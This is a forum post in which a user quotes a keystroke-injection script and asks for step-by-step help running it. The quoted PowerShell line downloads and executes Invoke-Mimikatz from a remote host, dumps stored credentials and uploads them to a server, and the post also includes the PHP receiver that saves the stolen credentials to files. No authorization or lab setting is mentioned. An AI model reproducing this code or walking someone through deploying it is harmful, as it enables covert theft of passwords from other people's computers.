Jump to content

Garfield025

Members
  • Posts

    3
  • Joined

  • Last visited

Posts posted by Garfield025

  1. Hi, I've been trying to set up the script for some time, which is the following: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style, in the first part it says the following: 

    REM Download and execute Invoke Mimikatz then upload the results
    STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)"
    ENTER
    DELAY 15000

    Where can I upload the files and how?
    The rx.php where it is put, on the server?

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
    file_put_contents($file, file_get_contents("php://input"));
    ?>

    How do I execute it?
    I would very much appreciate someone helping me step by step to do it.

×
×
  • Create New...